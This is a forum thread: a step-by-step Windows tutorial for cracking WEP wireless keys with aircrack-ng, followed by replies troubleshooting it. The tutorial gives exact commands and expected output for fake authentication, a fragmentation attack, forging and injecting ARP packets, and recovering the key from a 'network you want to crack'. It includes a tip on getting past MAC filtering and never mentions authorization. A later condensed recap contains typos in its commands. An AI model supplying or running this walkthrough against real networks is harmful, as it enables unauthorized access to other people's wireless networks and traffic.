THE CRACKING:

Step 1:
- Open a command prompt (start > run > cmd.exe)

Step 2:
- type the following in the command prompt: Quote: cd c:\aircrack\ - HIT ENTER

Step 3:
- type the following in the same command prompt: Quote: airserv-ng -d commview.dll - HIT ENTER - You should see something like this coming up in the command prompt Quote: Opening card commview.dll Setting chan 1 Opening sock port 666 Serving commview.dll chan 1 on port 666

Step 4:
- Open a new command prompt (LEAVE THE PREVIOUS ONE OPEN AT ALL TIMES!!) - Typ the following the the new command prompt: Quote: cd c:\aircrack\ -HIT ENTER

Step 5:
- Now typ this in the same command prompt: Quote: airodump-ng 127.0.0.1:666 - HIT ENTER note: if you know what channel the to-monitor-network is on you can make it this. I recommend this!:

Quote: airodump-ng --channel YOURCHANNELNUMBER HERE 127.0.0.1:666

Airodump-ng should start capturing data from the networks on the given channel now, you'll notice it isn't going fast (except if it's a big company's network or something). We are going to speed this process up! Take a note of the following: 1: BSSID of the network you want to crack = MAC address. 2: ESSID of the network you want to crack = name of the network (example: wifi16, mynetwork,...) 3: The mac of the card you are using to monitor the packets LEAVE THE 2 COMMAND PROMPTS YOU ALREADY HAVE OPEN OPEN!!!

Step 6:
- Open a new command prompt - Type in the following: Quote: cd c:\aircrack\ - HIT ENTER

Step 7:
- Type in the following in command prompt: Quote: aireplay-ng -1 0 -e ESSID-OF-THE-NETWORK-YOU-WANT-TO-CRACK -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666

yes quite confusing so a quick example: ESSID = wifi16 BSSID = 11:22:33:44:55:66 MAC OF CARD I'M USING = 01:23:45:67:89:01 so that will get me: aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666 if all goes well you'll get this as the outcome: Quote: Sending Authentication Request Authentication successful Sending Association Request Association successful

if you get: Quote: AP rejects the source MAC address It means MAC filtering is enabled on the network you want to crack and you'll need to get hold of a mac address that's allowed access. if you keep getting: Quote: sending authentication request Try moving closer to the AP!

Step 8:
in the same command prompt as the one in step 7 type: Quote: aireplay-ng -5 -b BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666

yes quite confusing once again so a quick example: BSSID = 11:22:33:44:55:66 MAC OF CARD I'M USING = 01:23:45:67:89:01 so that will get me: aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666 if all goes well you'll get this: Quote: Waiting for a data packet... Read #number packets...

Step 9:
if you wait a little bit you'll soon be prompted with a packet like this: Quote: Size: 120, FromDS: 1, ToDS: 0 (WEP) BSSID = the bssid Dest. MAC = the dest mac Source MAC = the source mac

0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@. 0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz. 0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn. 0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0. 0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l.... 0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.).. 0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q .D...w.....<R. 0x0070: 0505 933f af2f 740e ...?./t. Use this packet ?

note: size can vary, I always pressed in y and it worked - press in Y - HIT ENTER You should see something like this coming up (or similar): Quote: Saving chosen packet in replay_src-0124-161120.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0124-161129.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Note 1: It doesn't need to be 1500 bytes!! Note 2: Check the bold part, you're going to need this file! AGAIN DON'T CLOSE THIS COMMAND PROMPT!! if you keep getting: Quote: Data packet found! Sending fragmented packet No answer, repeating... Trying a LLC NULL packet Sending fragmented packet No answer, repeating...

Sending fragmented packet ... Just keep trying! It automatically starts over again (moving closer to the AP has been reported to help.)

anyways, if you got the bytes of keystream (everything worked) it's time for the next step!

Step 10:
- Press CTRL + C in the command prompt used in step 8 - Now type in the following: Quote: packetforge-ng -0 -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR -k 192.168.1.100 -l (= an ELL not a 1) 192.168.1.1 -y fragment-0124-161129.xor -w arp-request

Remember the file I made bold in part 8? Well it's obviously the same as in 9 meaning you need to put the same filename here. The part I made green here is the filename you use to save the packet, you can choose whatever you want but you must use this filename in the upcomming steps!

Step 11:
Now that we've got our ARP REQ packet we can start injecting! Here's how to do this. - Go to the command prompt used in step 9 - Type in the following: Quote: aireplay-ng -2 -r arp-request 127.0.0.1:666 The green part once again indicates the filename! You should now see something like this coming up: Quote: Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:0F:B5:AB:CB:9D 0x0000: 0841 0201 0014 6c7e 4080 000f b5ab cb9d .A....l~@....... 0x0010: ffff ffff ffff 8001 6c48 0000 0999 881a ........lH...... 0x0020: 49fc 21ff 781a dc42 2f96 8fcc 9430 144d I.!.x..B/....0.M

0x0030: 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1 :.....gC.V$..... 0x0040: d64f b709 .O.. Use this packet ? - Type in Y - HIT ENTER This should come up now: Quote: Saving chosen packet in replay_src-0124-163529.cap You should also start airodump-ng to capture replies. End of file. sent #numberOfPackets ... (#number pps) You'll see the numberOfPackets rising really fast, you are injecting these packets now.

Step 12:
Now go back to the command prompt where you had airodump-ng in open and press CTRL + C now type in the following: Quote: airodump-ng --channel CHANNELYOUWANTTOCAPTUREFROM --write Filename 127.0.0.1:666 Note: Filename = The name of the file where the data packets are saved, this will be used in the next step If all goes correct you should be capturing as much packets per second as you are injecting (maybe even more).

Step 13:
when you think you have enough... note: 200000 min for 64bit (just capture 1Million to be sure) ...press CTRL + C in the command prompt that has airodump-ng running and enter the following: Quote: aircrack-ng -n 64 Filename.cap

note: Filename = see previous step 64 = the bit depth of the key (128 for 128bit etc...)

and if it goes like planned a message will pop-up saying: Quote: KEY FOUND: YourKey

That's it! I hope this was helpful, any question/remarks/complaints please ask/tell and I'll try to help/respond as soon as possible!! Extra useful links: WEP CRACK tutorial from nokia: viewtopic.php?t=2069&highlight=wep Info about the attack used(fragmentation): http://www.aircrack-ng.org/doku.php?id=fragmentation Zermelo's thread about this subject: viewtopic.php?t=6781&postdays=0&postorder=asc&start=0 Topic on another forum about this: http://tinyshell.be/aircrackng/forum/in ... pic=1626.0 ------------------------------------------------------------------------------------------Greetz .Transmit (If you all like this tut I'll make one on cracking WEP with commview too)

Last edited by .Transmit on Tue May 11, 2010 7:45 pm, edited 2 times in total.

dgpilot

Post subject: Posted: Fri May 18, 2007 6:02 pm

This tut is AWESOME!!! And so far it works like a charm, thanks very much. The only thing I had trouble with is step 3. It didn't work for me unless I entered the device id Probie Joined: Fri May 18, 2007 1:13 am

Posts: 8

dinowuff

Post subject: Posted: Fri May 18, 2007 6:26 pm

WRONG WRONG WRONG Step one is Turn ON Laptop... Just Kidding Nice example with good detail. Way to pull all that info into one place. _________________ Joined: Sun Dec 25, 2005 11:26 pm Posts: 4933 Location: Michigan

I've posted HOW many

No lusers were harmed in the creation of this Taz Zone Post. AND I WANT TO KNOW WHY NOT!
09:F9:11:02:9D:74:E3:5B:D8:41:56:C5:63:56:88:C0

dinowuff

Post subject: Posted: Fri May 18, 2007 6:35 pm

Now go dig it! I just submitted the thing _________________ I've posted HOW many Joined: Sun Dec 25, 2005 11:26 pm Posts: 4933 Location: Michigan

No lusers were harmed in the creation of this Taz Zone Post. AND I WANT TO KNOW WHY NOT!
09:F9:11:02:9D:74:E3:5B:D8:41:56:C5:63:56:88:C0

brandnew2this

Post subject: Posted: Fri May 18, 2007 7:46 pm

I COULD be out shopping Joined: Wed Mar 14, 2007 2:15 am Posts: 65 Location: Kentucky

I had trouble with step 3 as well what did you all do excactly. mine said somthing about adapter not found. its a netgear and i know it works with comm view,wil packets, aircrack and back track so i was just trying to do it this way in order to make a video tutorial or somthing

jaymill230

Post subject: Posted: Fri May 18, 2007 7:52 pm

I'm doing video tutorials for backtrack, but I've been a bit lazy lately UtterTazNutter Joined: Thu Jan 04, 2007 9:59 pm Posts: 2227 Location: Camp Lejeune, NC _________________ oo-rah www.jaymill.net

.Transmit

Post subject: Posted: Fri May 18, 2007 9:51 pm

Strange, I'll try and see if I can get a solution for that problem with step 3, what error were you getting exactly?

1st Century Addict Joined: Sat Nov 04, 2006 12:47 pm Posts: 109

EDIT: K maybe found a solution for the ones in trouble with step 3! Try this (let me know if it works): type this in the command window where the airserv command failed: Quote: airserv-ng -d "commview.dll|debug" Quotes are important! You probable get something like this: Quote: Opening card commview.dll|debug Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470 get_guid: name: {15A802FC-ACEE-4CCB-B12A72CAA3EBDA82} desc: ORiNOCO 802.11bg Co mboCard Gold - Paketplaner-Miniport Adapter not found get_guid() airserv-ng: wi_open(): No error

now type this: Quote: airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A72CAA3EBDA82}" Quotes are important! The red parts need to be the same! (they probably differ for everyone) Let me know if it works! and still try to give me the full error.

dgpilot

Post subject: Posted: Fri May 18, 2007 10:48 pm

Yep thats what I had used earlier and it worked. I guess it depends on your config and cards.

Probie Joined: Fri May 18, 2007 1:13 am Posts: 8

brandnew2this

Post subject: Posted: Sat May 19, 2007 7:22 am

will try in the a.m. i just got back from my bacholer party so im not really feeling like............well you know I COULD be out shopping Joined: Wed Mar 14, 2007 2:15 am Posts: 65 Location: Kentucky

gismo

Post subject: Re: Tutorial: Crack WEP with aircrack + inject packets (WIND Posted: Sun May 20, 2007 6:54 pm

Wannabee

Hello there! This tutorial looks really amazing, however I'am having a trouble with the step number 3 - after typing airserv-ng -d commview.dll instead of Opening card commview.dll Setting chan 1 Opening sock port 666 Serving commview.dll chan 1 on port 666

Joined: Sun May 20, 2007 6:33 pm I see Posts: 1 Opening card commview.dll F1 init_lib<> airserv-ng: wi_open<>: No error After I try to type in step 5 airodump-ng 127.0.0.1:666 or airodump-ng --channel YOURCHANNELNUMBER HERE 127.0.0.1:666 (In my case channel 7 is the best one) I just get a message Failed to connect In other words connecting to 127.0.0.1:666 is not possible in my case. I ask you for apologies, I am a newbie, just let me know if you have any idea how to work this out. I am using Windows Vista on Acer laptop with Atheros AR5005G network adapter, I installed everything according to the advices (drivers, dll files etc., commview is working normally as well). Every little helps. Thanks.[/i]

Xplode

Post subject: Posted: Thu May 24, 2007 8:34 pm

gismo are you sure you got the right drivers?? I solved the problem installing Commview drivers, i had Wildpackets first. I wanted to ask if the debug function would work like this in case i am using wildpackets: airserv-ng -d "peek.dll|debug" Or what else?? The AP i am connecting to seems to have a very low traffic so i keep having (at step 9): Joined: Thu May 24, 2007 Data packet found! 8:18 pm Probie

Posts: 7

Sending fragmented packet No answer, repeating... Trying a LLC NULL packet Sending fragmented packet No answer, repeating... Sending fragmented packet ... even after trying for 2 hours...is the low traffic the problem?? I'm saying it because in airodump i got around 10 beacons per second but NO DATA (data=0) for my AP. How could i increase that?? I tried by connecting (without a valid WEP Key) using my integrated wireless card, and i had some data, but not sufficient or useful. Can someone give me some hints please?

jaymill230

Post subject: Posted: Thu May 24, 2007 8:43 pm

check my tutorial for clientless WEP cracking with fake auth, its written for backtrack, but does the exact same thing, range is often a problem. UtterTazNutter Joined: Thu Jan 04, 2007 9:59 pm Posts: 2227 Location: Camp Lejeune, NC _________________ oo-rah www.jaymill.net

Xplode

Post subject: Posted: Thu May 24, 2007 8:57 pm

i don't think range is my problem, signal is very strong, could it be that anyway? i ll read your tut carefully, thanx

Probie Joined: Thu May 24, 2007 8:18 pm Posts: 7

Mufftool

Post subject: Posted: Thu May 24, 2007 9:42 pm

Hi, I can get to step 9, but when I enter Y after 'Use this packet?', I get blue screen, flashed error message and my computer dies.

Probie Joined: Thu May 24, 2007 9:16 pm Posts: 5

jaymill230

Post subject: Posted: Fri May 25, 2007 12:24 am

the program was just recently patched to windows, so its a bit buggy. It may be a driver problem, try reinstalling your wildpackets driver. UtterTazNutter Joined: Thu Jan 04, 2007 9:59 pm Posts: 2227 Location: Camp Lejeune,

NC
In this example: the id# of my adapter is {177946D-6D58-4272-AACE-D11DFAE55B8D} the essid of the AP is VQD21 the bssid of the Ap is 00:18:01:E6:B4:3F the mac address of MY adapter is: 00:0E:9B:45:40:ED the AP is on channel 9 the driver is the commview atheros driver Fragmentation Attack Step 1: Start the wireless interface in monitor mode on AP channel Airserv-ng d commview.dll|{177946D-6D58-4272-AACE-D11DFAE55B8D} c9 Step 2: Use aireplay-ng to do a fake authentication with the access point Aireplay-ng -1 0 e VQD21 a 00:18:01:E6:B4:3F h 00:0E:9B:45:40:ED 127.0.0.1:666 Step 3: Use aireplay-ng to run the fragmentation attack and obtain PRGA Data aireplay-ng -5 -b 00:18:01:E6:B4:3F -h 00:0E:9B:45:40:ED 127.0.0.1:666 Step 4: Use packetforge to generate an ARP packet packetforge-ng -0 -a 00:18:01:E6:B4:3F -h 00:0E:9B:45:40:ED -k 255.255.255.255 -l 255.255.255.255 -y fragment-0124-161129.xor -w arp-request.cap Step 5: Use aireplay-ng to replay our forged ARP request aireplay-ng -2 -r arp-request.cap 120.0.0.1:666 Step 6: Start airodump-ng to capture the IVs Airodump-ng c 9 -bssid 00:18:01:E6:B4:3F -ivs w VQD21 127.0.0.1:666 Step 7: Run aircrack-ng to obtain the WEP key aircrack-ng -b 00:18:01:E6:B4:3F VQD21.ivs

as a hurestic consideration, for a 64 bit key, you should capture 250,000 ivs, 2,000,000 for 104 bit key.